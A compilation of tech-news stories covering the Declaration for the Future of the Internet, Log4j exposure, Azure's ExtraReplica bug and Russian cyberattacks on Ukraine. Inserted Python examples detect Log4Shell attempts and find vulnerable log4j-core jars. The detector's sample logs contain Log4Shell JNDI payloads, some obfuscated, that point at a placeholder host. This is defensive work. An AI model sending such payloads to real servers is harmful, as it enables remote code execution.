More stories


    China, India, Russia missing from future of internet pledge by US, EU, and 33 others

    The United States, the European Union, the United Kingdom, and 32 other nations have committed to the Declaration for the Future of the Internet [PDF], an agreement to strengthen democracy online by agreeing not to undermine elections by running online misinformation campaigns or to illegally spy on people, the White House said on Thursday. The declaration also commits to promote safety, particularly among young people and women, and the equitable use of the internet. Further, the countries have agreed to refrain from imposing government-led shutdowns and committed to providing affordable and reliable internet services.

    Although not legally binding, the declaration states that the principles should be used “as a reference for public policy makers, as well as citizens, businesses, and civil society organizations”. In a statement the White House said it would work together with partner nations to promote the declaration’s principles, while holding mutual respect for each individual nation’s regulatory autonomy. So far, 60 countries have endorsed the declaration, and according to the European Commission, more are expected to join in the coming weeks.

    Notable omissions include India, China, and Russia. Their absence is hardly surprising given that Ukraine is a signatory, and that the declaration calls on countries to refrain from using social score cards, a transparent criticism of China’s social credit score. Meanwhile, a senior Biden administration official responded to India’s absence by claiming “the hope remains that time isn’t fully passed yet for India to join”.

    Google responded in support of the declaration, but made clear that the private sector must also play an important role in furthering internet standards when faced with a global crisis. “Since Russia’s invasion in Ukraine, our teams have been working around the clock to support people in Ukraine through our products, defend against cybersecurity threats, and surface high-quality, reliable information,” said Google in a statement. Microsoft president and vice chair Brad Smith shared this sentiment, arguing in a blog post that governments cannot manage the global challenges facing the management of the internet alone. “We need new and innovative internet initiatives that bring governments together with NGOs, academic researchers, tech companies and many others from across the business community,” said Smith.

    Signatories beyond the US, UK, and 27 EU members include: Albania, Andorra, Argentina, Australia, Cabo Verde, Canada, Colombia, Costa Rica, Dominican Republic, Georgia, Iceland, Israel, Jamaica, Japan, Kenya, Kosovo, Maldives, Marshall Islands, Micronesia, Moldova, Montenegro, New Zealand, Niger, North Macedonia, Palau, Peru, Senegal, Serbia, Taiwan, Trinidad and Tobago, Ukraine, and Uruguay.


    Microsoft readies a built-in VPN for Edge powered by Cloudflare

    Mary Jo Foley, Contributor

    Mary Jo Foley has covered the tech industry for 30 years for a variety of publications, including ZDNet, eWeek, and Baseline. She is the author of Microsoft 2.0.

    Microsoft is looking to give its Edge browser an extra security boost with a coming feature called “Edge Secure Network.” The VPN service will be powered by Cloudflare, as noted in a recently discovered Microsoft Support page about the feature. (Thanks to XDA Developers for the link.)

    Edge Secure Network isn’t yet available to Edge Dev Channel testers, and there’s no indication when it will be. The feature requires users to be signed into their Microsoft Accounts and provides 1 GB of free data per month, tied to the account. Edge Secure Network routes data from Edge through an encrypted tunnel to Cloudflare, “even when using a non-secure URL that starts with HTTP,” the support page says. That gives users an extra layer of protection against someone on a shared public Wi-Fi network reading their browsing data. The caveat worth keeping in mind is that the tunnel only covers the hop between the browser and Cloudflare’s network: a plain-HTTP request is still sent in the clear from the tunnel’s exit point to the destination site, and that exit point necessarily sees the unencrypted traffic, so the feature does not make an HTTP site equivalent to an HTTPS one. Cloudflare permanently deletes any diagnostic and support data it collects every 25 hours. The capability can also help prevent online tracking and keep users’ locations private, and will be available for free, the support page indicates. Instructions for turning on Secure Network, once it’s available, are in the Edge support page article.

    Some other browser vendors, such as Opera, already have VPN integration. Mozilla, while not integrating its own VPN into Firefox, makes its VPN available separately to customers.


    Log4j flaw: Thousands of applications are still vulnerable, warn security researchers

    Months on from a critical zero-day vulnerability being disclosed in the widely-used Java logging library Apache Log4j, a significant number of applications and servers are still vulnerable to cyberattacks because security patches haven’t been applied. First detailed in December, the vulnerability (CVE-2021-44228) allows attackers to remotely execute code and gain access to systems that use Log4j. 

    Not only is the vulnerability relatively simple to exploit, but the ubiquitous nature of Log4j means it’s embedded in a vast array of applications, services and enterprise software tools written in Java – and used by organisations and individuals around the world. It’s why the director of the US Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, described the vulnerability as “one of the most serious that I’ve seen in my entire career, if not the most serious”.

    But despite critical warnings over the vulnerability, there are still a large number of Log4j instances operating in the wild that have yet to be patched and remain exposed to attack. According to researchers at cybersecurity company Rezilion, there are over 90,000 vulnerable internet-facing applications and more than 68,000 servers that are still publicly exposed. The exposed instances were discovered by running searches through the Internet of Things (IoT) search engine Shodan – and the researchers warn that what’s been discovered is likely “just the tip of the iceberg” in terms of the actual vulnerable attack surface.

    Log4j vulnerabilities leave organisations open to a range of attacks from cyber criminals, who can easily scan for vulnerable instances to exploit. Not long after Log4Shell was disclosed, attempts were made to deploy ransomware and crypto-mining malware on vulnerable servers. State-sponsored hacking groups have also been spotted attempting to take advantage of Log4j vulnerabilities, including the Chinese state-sponsored espionage groups Hafnium and APT41, as well as the Iranian-backed groups APT35 and Tunnel Vision.
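    The scanning and exploitation attempts described above leave a recognisable string in whatever request field the application logs, so they are visible in ordinary web-server access logs. The detector below is an added example written for this page, not code from Rezilion or from ZDNet; the log lines it runs over are constructed (RFC 5737 documentation addresses) and the function and constant names are its own. It handles the obfuscations that were common in the wild: URL encoding, the ${lower:x}/${upper:x} lookups and the ${::-x} default-value trick, all of which Log4j resolves before it ever reaches the JNDI lookup, so a detector has to resolve them too.

```python
"""Triage web-server access logs for Log4Shell (CVE-2021-44228) exploitation attempts.

Attackers place a ${jndi:...} lookup in any field the application logs (URL,
User-Agent, Referer are the usual ones) and frequently hide it behind Log4j's
own nested lookups and URL encoding. Normalise first, then match."""
import re
from urllib.parse import unquote

# Apache/Nginx "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"'
)
# An innermost ${...} lookup, i.e. one containing no further nesting.
INNER_LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# What survives normalisation when the payload is a JNDI lookup: ${jndi:<scheme>...
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)", re.IGNORECASE)


def _resolve_inner(match):
    """Evaluate one innermost lookup the way Log4j would, or leave it untouched."""
    body = match.group(1)
    if ":-" in body:                      # ${anything:-default} evaluates to default
        return body.split(":-", 1)[1]
    if ":" in body:
        func, arg = body.split(":", 1)
        if func.lower() == "lower":
            return arg.lower()
        if func.lower() == "upper":
            return arg.upper()
    return match.group(0)                 # unknown lookup (jndi, env, ...): keep as-is


def normalise(value, max_rounds=10):
    """Undo (possibly stacked) URL encoding, then collapse nested lookups inside-out."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    for _ in range(max_rounds):
        collapsed = INNER_LOOKUP_RE.sub(_resolve_inner, value)
        if collapsed == value:
            break
        value = collapsed
    return value


def detect_log4shell(log_text):
    """One finding per logged field that contains a JNDI lookup after normalisation."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not combined format; a real tool would flag this
        for field in ("request", "referer", "user_agent"):
            norm = normalise(m.group(field))
            hit = JNDI_RE.search(norm)
            if hit:
                findings.append({
                    "src_ip": m.group("ip"),
                    "time": m.group("time"),
                    "field": field,
                    "scheme": hit.group(1).lower(),
                    "payload": norm[hit.start():hit.start() + 120],
                })
    return findings


# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [11/Dec/2021:02:14:07 +0000] "GET /?q=${jndi:ldap://203.0.113.99:1389/a} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Dec/2021:02:15:11 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.99/x}"',
    '203.0.113.8 - - [11/Dec/2021:02:16:00 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F203.0.113.99%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [11/Dec/2021:02:16:45 +0000] "GET /api HTTP/1.1" 200 77 "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.99/z}" "python-requests/2.26"',
    '198.51.100.2 - - [11/Dec/2021:02:17:30 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
])

if __name__ == "__main__":
    for f in detect_log4shell(SAMPLE_LOG):
        print(f"{f['src_ip']:14} {f['field']:10} {f['scheme']:5} {f['payload']}")
```

    A hit says an attempt was made, not that it succeeded; the confirming signal is an outbound LDAP/RMI/DNS connection from the server to the host named in the payload. The detector also only sees fields the combined log format records, so payloads delivered in other headers (X-Api-Version and X-Forwarded-For were also used in the wild) need application-level logging to catch.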
    While state-sponsored groups are likely to have deep pockets and plentiful resources, the ability to exploit common vulnerabilities is particularly useful to them because such attacks are less likely to leave traces that could be tied to a specific group.

    One reason Log4j vulnerabilities are still lingering is that the flaw can be deeply ingrained in applications, to the extent that it might not even be clear that the Java logging library is part of the system at all: it is usually bundled inside a vendor’s application archive rather than installed as a separately visible package. But there are steps that can – and should – be taken to protect the network against attacks that try to exploit Log4j, the most vital of which is identifying and patching insecure instances of Log4j. The network should also be examined regularly to identify potential vulnerabilities. “You need to have processes in place that continuously monitor your environment for critical vulnerabilities with an emphasis on third-party code,” said the report. If a vulnerable Log4j asset is identified, the recommendation is that information security teams act on the basis that the system has already been compromised: look for signs of malicious activity and prepare to respond.
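    Identifying insecure instances is the step that trips teams up, because log4j-core normally sits inside a WAR or fat JAR rather than in a package manager’s inventory. The scanner below is an added example written for this page, not code from Rezilion or ZDNet. It walks archives recursively (a JAR inside a WAR inside an EAR), reads the version the Maven build records in META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties, and applies the CVE-2021-44228 version ranges (fixed in 2.15.0 on the main line, 2.12.2 on the Java 7 line and 2.3.1 on the Java 6 line), treating a copy whose JndiLookup.class has been deleted as mitigated. The fixtures at the bottom are constructed stand-ins holding only the entries the scanner inspects, and every function and constant name is this example’s own.

```python
"""Locate log4j-core inside JAR/WAR/EAR archives (and archives nested in them), read the
version the Maven build records in pom.properties, and decide exposure to CVE-2021-44228."""
import io
import os
import re
import zipfile

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
POM_RE = re.compile(r"(^|/)META-INF/maven/org\.apache\.logging\.log4j/log4j-core/pom\.properties$")
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_MAINLINE = (2, 15, 0)   # first mainline release carrying the CVE-2021-44228 fix


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); pre-release tags dropped ('2.0-beta9' -> (2, 0, 0)); junk -> (0, 0, 0)."""
    nums = [int(n) for n in re.findall(r"\d+", text.split("-")[0])]
    return tuple((nums + [0, 0, 0])[:3])


def vulnerable_to_cve_2021_44228(version, has_jndi_lookup):
    """Affected: 2.0 up to (not including) 2.15.0, except the 2.12.2+ (Java 7) and 2.3.1+
    (Java 6) backport lines. No JndiLookup class (the documented stop-gap mitigation) means
    the lookup cannot run; an unreadable version with the class present is treated as affected."""
    if not has_jndi_lookup:
        return False
    v = parse_version(version)
    if v == (0, 0, 0):
        return True
    if v[0] != 2 or (2, 12, 2) <= v < (2, 13, 0) or (2, 3, 1) <= v < (2, 4, 0):
        return False
    return v < FIXED_MAINLINE


def _read_version(zf, pom_entry):
    for line in zf.read(pom_entry).decode("utf-8", "replace").splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "version":
            return value.strip()
    return "unknown"


def scan_archive(data, where):
    """Findings for one archive given as bytes, recursing into archives nested inside it."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings                   # not a zip container: nothing to inspect
    with zf:
        names = zf.namelist()
        pom = next((n for n in names if POM_RE.search(n)), None)
        has_jndi = JNDI_LOOKUP_CLASS in names
        if pom is not None or has_jndi:   # shaded builds may keep the class but drop the pom
            version = _read_version(zf, pom) if pom is not None else "unknown"
            findings.append({
                "location": where,
                "version": version,
                "jndi_lookup_present": has_jndi,
                "cve_2021_44228": vulnerable_to_cve_2021_44228(version, has_jndi),
            })
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(scan_archive(zf.read(name), f"{where}!{name}"))
    return findings


def scan_directory(root):
    """Scan every archive under a directory tree (e.g. an application server's deploy root)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    findings.extend(scan_archive(fh.read(), path))
    return findings


# Constructed fixtures: stand-ins holding only the entries the scanner inspects.
def make_log4j_core_jar(version, include_jndi_lookup=True, include_pom=True):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if include_pom:
            zf.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties",
                        f"#Generated by Maven\nversion={version}\nartifactId=log4j-core\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # placeholder class bytes
    return buf.getvalue()


def make_war(inner_jar, jar_name="log4j-core.jar"):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr(f"WEB-INF/lib/{jar_name}", inner_jar)
    return buf.getvalue()
```

    Point scan_directory() at deployment roots, not just at lib directories. A finding with version “unknown” means a shaded build whose pom.properties was stripped; it is flagged on the strength of JndiLookup.class alone and needs a manual look. The check covers CVE-2021-44228 only: later Log4j 2 CVEs mean the target for an upgrade is a release well beyond 2.15.0, not 2.15.0 itself.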


    ExtraReplica: Microsoft patches cross-tenant bug in Azure PostgreSQL

    Microsoft has patched a security weakness in Azure PostgreSQL which could have been exploited to execute malicious code.

    On Thursday, researchers from Wiz Research published an advisory on “ExtraReplica,” described as a “cross-account database vulnerability” in Azure’s infrastructure. Microsoft Azure is a hybrid cloud service with hundreds of thousands of enterprise customers. According to Wiz, a chain of vulnerabilities could be used to bypass Azure’s tenant isolation, the boundary that stops one customer of a multi-tenant service from accessing resources belonging to another tenant.

    ExtraReplica’s core attack vector is a flaw that allowed attackers read access to other tenants’ PostgreSQL databases without authorization. Once a target public PostgreSQL Flexible Server has been selected, an attacker first has to find the target’s Azure region “by resolving the database domain name and matching it to one of Azure’s public IP ranges,” according to Wiz. An attacker-controlled database then has to be created in the same region. The first vulnerability, found in Azure’s modifications to the PostgreSQL engine, would be exploited on the attacker-controlled instance to escalate to ‘superuser’ privileges and gain code execution. The second bug in the chain, in the certificate authentication process, would then be triggered on the target instance via replication to gain read access to its data.

    While this attack could be used against targets on the same subnet, the Certificate Transparency feed could also be abused to retrieve domain SSL certificates and extract a database’s unique identifier, expanding the potential attack surface beyond a subnet. An attacker would need to retrieve target information from the Certificate Transparency feed and purchase a “specifically crafted certificate” from a CA to perform such an exploit. The vulnerability doesn’t, however, impact Single Server instances or Flexible Servers with “VNet network configuration (Private access)” enabled, according to the researchers.

    The vulnerability was disclosed to Microsoft in January. Microsoft’s security team triaged the vulnerability and was able to replicate the flaw. Wiz was awarded a bug bounty of $40,000 for its report, and Microsoft rolled out a fix by February 25. Now fully mitigated, Azure customers do not need to take any action. Microsoft is not aware of any exploitation in the wild. “We appreciate MSRC’s cooperation and their attentiveness to our report,” the researchers commented. “Their professional approach and close communication throughout the disclosure process is a model for all vendors.”


    Microsoft: Russia has launched hundreds of cyberattacks against Ukraine

    Microsoft says it observed six Russia-aligned, state-sponsored hacking groups launch more than 237 cyberattacks against Ukraine, starting in the weeks before Russia’s February 24 invasion. Microsoft has released an in-depth report detailing how Russian cyberattacks against Ukraine were “strongly correlated” or “directly timed” with its military operations in the country.


    For example, on March 1, several Kyiv-based media companies were struck by destructive and information-stealing malware, coinciding with a missile strike on a Kyiv TV tower the same day. Then on March 13, a suspected Russian nation-state actor stole data from a nuclear safety organization, aligning with Russian troops seizing the Chernobyl nuclear power plant and the Zaporizhzhia Nuclear Power Plant.

    The report takes a closer look at Russia’s use of destructive malware before and during the invasion, the first of which was discovered by Microsoft in mid-January and dubbed WhisperGate. The combination of cyber and military action points to Russia’s hybrid warfare strategy, according to Microsoft. “Russia’s use of cyberattacks appears to be strongly correlated and sometimes directly timed with its kinetic military operations targeting services and institutions crucial for civilians,” says Corporate Vice President, Customer Security & Trust, Tom Burt.

    According to the report, the day before Russia’s military invaded Ukraine, operators linked to the GRU – Russia’s military intelligence service – launched destructive wiper attacks on hundreds of systems in Ukrainian government, IT, energy, and financial organizations. Microsoft detected 37 destructive malware attacks against Ukraine between February 24 and April 8 from eight known destructive malware families, including FoxBlade, which Microsoft found in February, FiberLake, IsaacWiper/HermeticWiper/SonicVote, and CaddyWiper, as well as Industroyer2, aimed at industrial control systems (ICS). In many cases, the malware used the SecureDelete utility to wipe data. The US government two weeks ago warned of suspected Russian malware called Pipedream that was customized to compromise multiple vendors’ ICS equipment.

    Ukraine officials earlier this month also said they stopped a cyberattack on an energy facility that could have cut power to two million people. “Known and suspected Russian threat actors deployed malware and abused legitimate utilities 37 times to destroy data on targeted systems. SecureDelete is a legitimate Windows utility that threat actors abused to permanently delete data from targeted devices,” Microsoft says in the report. “More than 40% of the destructive attacks were aimed at organizations in critical infrastructure sectors that could have negative second-order effects on the government, military, economy, and people,” Microsoft says. Additionally, 32% of destructive incidents affected Ukrainian government organizations at the national, regional, and city levels.

    The three Russian agencies Microsoft identifies in the report are the GRU (military intelligence), the SVR (Russia’s foreign intelligence service), and the FSB (Federal Security Service). The main methods of initial access were phishing, exploiting unpatched vulnerabilities, and compromising IT service providers. Microsoft says Russia’s cyberattacks appeared to “work in tandem” against targets of military activity. However, it was uncertain whether these were centrally coordinated or simply reflected a common set of understood priorities. “At times, computer network attacks immediately preceded a military attack, but those instances have been rare from our perspective. The cyber operations so far have been consistent with actions to degrade, disrupt, or discredit Ukrainian government, military, and economic functions, secure footholds in critical infrastructure, and to reduce the Ukrainian public’s access to information,” Microsoft says.

    Burt says that following Microsoft’s discovery of WhisperGate, it established a secure line of communication with Ukraine officials and has been providing support ever since. In the lead-up to the invasion, Microsoft also observed that Russian cyberattacks were growing increasingly loud and disruptive, and usually intensified following diplomatic failures related to the conflict with Ukraine and NATO members.

    Burt urged all organizations to take heed of alerts published by the US Cybersecurity and Infrastructure Security Agency (CISA) and other US government agencies, given the risk that NATO military support to Ukraine could see Russia’s efforts expand beyond Ukrainian targets. “Given Russian threat actors have been mirroring and augmenting military actions, we believe cyberattacks will continue to escalate as the conflict rages. Russian nation-state threat actors may be tasked to expand their destructive actions outside of Ukraine to retaliate against those countries that decide to provide more military assistance to Ukraine and take more punitive measures against the Russian government in response to the continued aggression,” warned Burt.

    This article has been updated to correct the name of the author of Microsoft’s blog, which was by Tom Burt – Corporate Vice President, Customer Security & Trust.


    Android security: We stopped billions of harmful app downloads, says Google

    Google says it blocked 1.2 million apps from being published to the Google Play store in 2021 because its app review processes detected policy violations, preventing “billions of harmful installations” on Android devices. Google’s Play Store reviews have often been seen as less strict than Apple’s App Store reviews, but Google says it is making bigger efforts to protect the privacy and security of people using the three billion active Android devices in use today. Google says it also banned 190,000 bad accounts in 2021 as part of its efforts to hinder malicious and spam developers, and closed 500,000 inactive or abandoned developer accounts.

    “Last year we introduced multiple privacy focused features, enhanced our protections against bad apps and developers, and improved SDK data safety. In addition, Google Play Protect continues to scan billions of installed apps each day across billions of devices to keep people safe from malware and unwanted software,” Google’s Android and Privacy teams said in a blogpost.

    Google’s initiatives in 2021 aimed to strike a balance between end-user safety and convenience for the developers whose work drives the Play Store, which had about 3.5 million apps available for download. The volume of transactions on Apple’s and Google’s app stores is staggering. According to mobile ad analytics firm App Annie, consumers spent $170 billion on mobile apps in 2021, with roughly a 65% share of revenues going to Apple’s App Store and 35% going to Google Play. Consumers downloaded 230 billion new apps in 2021, or about 435,000 apps per minute. But 98.3 billion of those downloads were by users in China, where Google Play is not available, while US consumers accounted for 12 billion of the total.

    In an effort to improve transparency for end users, Google introduced a data safety program last May that requires developers to give users details about the types of data collected by an app, the use of encryption, and how data is used. Google requires developers to fix any detected policy violations, and they risk further enforcement if they don’t comply with Google’s requested fixes. Developers have until July 20 to declare to Play store users the information required by the data safety initiative. Google also regularly removes malicious apps from the Play store after they’re discovered by third-party researchers, who still manage to find them on a reasonably regular basis.

    To help developers manage rejections during the review process, Google has added a Policy and Programs section to the Google Play console. It also has a page to appeal decisions and track the status of a submission. The benefits of these initiatives are greater for those who’ve upgraded to the latest versions of Android. “As a result of new platform protections and policies, developer collaboration and education, 98% of apps migrating to Android 11 or higher have reduced their access to sensitive APIs and user data,” Google claims. “We’ve also significantly reduced the unnecessary, dangerous, or disallowed use of Accessibility APIs in apps migrating to Android 12, while preserving the functionality of legitimate use cases.”

    Google also noted that it disallowed the collection of the Advertising ID (AAID) and other device identifiers from all users in apps solely targeting children. These include identifiers such as the SIM serial number, MAC address, SSID, IMEI, and IMSI. It also gave all users the ability to delete their Advertising ID entirely, regardless of the app. Google Pixel is a small share of the overall Android market, but these users gained a new Security hub, a single page for managing all security settings.



    Remote execution holes in Log4j, Exchange and Confluence lead Five Eyes 2021 exploited CVE list

    Chris Duckett, APAC Editor

    Chris started his journalistic adventure in 2006 as the Editor of Builder AU after originally joining CBS as a programmer. After a Canadian sojourn, he returned in 2011 as the Editor of TechRepublic Australia, and is now the Australian Editor of ZDNet.

    During 2021, the top 15 exploited vulnerabilities – as observed by the US Cybersecurity and Infrastructure Security Agency (CISA), the NSA, the FBI, the Australian Cyber Security Centre, the Canadian Centre for Cyber Security, the New Zealand National Cyber Security Centre, and the United Kingdom’s National Cyber Security Centre – led to remote code execution (RCE) across a range of products, and left IT administrators with a short window to keep their house in order. “For most of the top exploited vulnerabilities, researchers or other actors released proof of concept code within two weeks of the vulnerability’s disclosure, likely facilitating exploitation by a broader range of malicious actors,” the agencies said in an alert.

    Topping the list was the RCE hole in the Java logging library Apache Log4j, CVE-2021-44228, also known as Log4Shell, which was disclosed in December. “The rapid widespread exploitation of this vulnerability demonstrates the ability of malicious actors to quickly weaponize known vulnerabilities and target organizations before they patch,” the alert said. This was followed by CVE-2021-40539, an RCE hole in Zoho ManageEngine ADSelfService Plus, and seven vulnerabilities in Microsoft Exchange Server that became known as ProxyShell and ProxyLogon. Next on the list was CVE-2021-26084 in Atlassian Confluence, which US Cybercom warned was facing mass exploitation in September; in this instance, the agencies said, exploit code was released a week after disclosure. The final 2021 vulnerability on the list was CVE-2021-21972, which impacted the VMware vSphere Client. Completing the list was a quartet of older vulnerabilities that the agencies had already highlighted in July: CVE-2020-1472 in Microsoft Netlogon, also called Zerologon; CVE-2020-0688 in Exchange; CVE-2019-11510 in Pulse Connect Secure; and CVE-2018-13379 in Fortinet FortiOS and FortiProxy.

    A secondary list of another 15 CVEs was also issued, and included holes in Accellion FTA, and additional RCE bugs in VMware vCenter and the Windows print spooler. To mitigate these vulnerabilities, the agencies repeated their advice on timely patching, having a centralised patch management system, and shifting to cloud or managed service providers if rapid scanning is not considered doable. The advice added that organisations should enforce multifactor authentication on all users without exception, with VPN logins in particular called out, as well as reviewing privileged accounts at least annually and adopting the principle of least privilege. Organisations should also move to application allowlisting, properly segment networks to limit lateral movement, and continuously monitor their attack surface.


    Google Search removal requests expanded to include personal contact information

    Aimee Chanthadavong, Senior Journalist

    Since completing a degree in journalism, Aimee has had her fair share of covering various topics, including business, retail, manufacturing, and travel. She continues to expand her repertoire as a tech journalist with ZDNet.

    Google has expanded Google Search removal requests to cover additional personally identifiable contact information, such as a person’s phone number, email address, or physical address. Until now, people have been able to request the removal of certain other sensitive information from Search, such as doxxing content – where a person’s contact information is shared in a malicious way – or information like bank account or credit card numbers that could be used for financial fraud. Under the expanded policy, users can also request the removal of additional information that may pose a risk of identity theft, such as confidential log-in credentials, when it appears in search results.

    “The availability of personal contact information online can be jarring — and it can be used in harmful ways, including for unwanted direct contact or even physical harm. And people have given us feedback that they would like the ability to remove this type of information from Search in some cases,” Google Search global policy lead Michelle Chang wrote in a post.

    Chang said that when a Google Search removal request is submitted, Google evaluates all the content on the web page. Following the evaluation, Google may remove the provided URL from all search queries; remove only the search results in which the query includes the person’s name or other provided identifiers, such as aliases; or, in some circumstances, deny the request. “We will evaluate all content on the web page to ensure that we’re not limiting the availability of other information that is broadly useful, for instance in news articles,” Chang said. “We’ll also evaluate if the content appears as part of the public record on the sites of government or official sources. In such cases, we won’t make removals.”

    Google warned, however, that removing content from Google Search does not remove it from the internet, and recommended that people contact the hosting site directly if they want the content removed entirely. This latest update follows Google rolling out a new policy last October that lets people under the age of 18, or their parents or guardians, request the removal of their images from Google search results.